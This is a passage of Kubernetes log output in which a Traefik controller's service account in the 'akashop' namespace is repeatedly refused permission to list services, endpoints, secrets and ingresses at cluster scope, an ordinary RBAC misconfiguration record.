cluster scope +E0330 06:40:12.125753 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:40:29.919360 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:40:29.919436 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:40:35.799271 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:40:35.799448 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:40:43.424231 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:40:43.424419 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:41:05.864161 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:41:05.864198 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:41:07.092457 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:41:07.092493 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:41:07.933305 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:41:07.933337 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:41:29.824400 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:41:29.824445 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:41:40.879799 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:41:40.879837 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:41:56.137725 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:41:56.137806 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:41:59.932706 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:41:59.932741 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:42:21.422402 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:42:21.422485 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:42:26.501458 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:42:26.501503 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:42:26.862495 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:42:26.862545 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:42:55.589428 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:42:55.589475 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:43:15.009691 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:43:15.009724 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:43:19.067774 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:43:19.067859 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:43:22.439617 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:43:22.439651 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:43:47.412004 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:43:47.412142 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:43:55.179053 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:43:55.179103 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:44:04.804564 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:44:04.804755 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:44:11.945358 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:44:11.945404 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:44:26.370982 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:44:26.371016 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:44:36.940322 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:44:36.940348 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:44:53.048777 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:44:53.048866 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:44:54.770253 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:44:54.770339 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:45:24.986279 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:45:24.986319 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:45:25.270728 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:45:25.270754 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:45:31.419720 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:45:31.419759 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:45:42.187432 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:45:42.187527 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:46:08.365250 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:46:08.365282 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:46:12.145807 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:46:12.145836 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:46:20.319614 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:46:20.319661 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:46:28.107339 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:46:28.107372 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:47:00.945218 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:47:00.945276 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:47:01.652329 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:47:01.652369 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:47:04.361918 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:47:04.362008 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:47:16.206726 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:47:16.206758 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:47:41.483690 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:47:41.483719 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:47:42.558493 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:47:42.558528 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:47:59.931437 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:47:59.931470 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:48:12.433325 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:48:12.433371 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:48:18.406959 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:48:18.406993 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:48:24.294113 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:48:24.294145 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:48:49.803701 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:48:49.803739 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:48:50.159851 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:48:50.159886 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:49:09.598446 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:49:09.598538 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:49:14.927377 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:49:14.927421 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:49:24.964000 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:49:24.964071 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:49:32.572670 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:49:32.572700 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:49:47.064809 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:49:47.064843 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:50:10.922112 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:50:10.922280 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:50:16.450861 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:50:16.450897 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:50:21.112753 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:50:21.112779 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:50:34.016301 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:50:34.016351 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:50:55.702464 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:50:55.702504 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:51:10.900827 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:51:10.900866 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:51:13.946495 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: 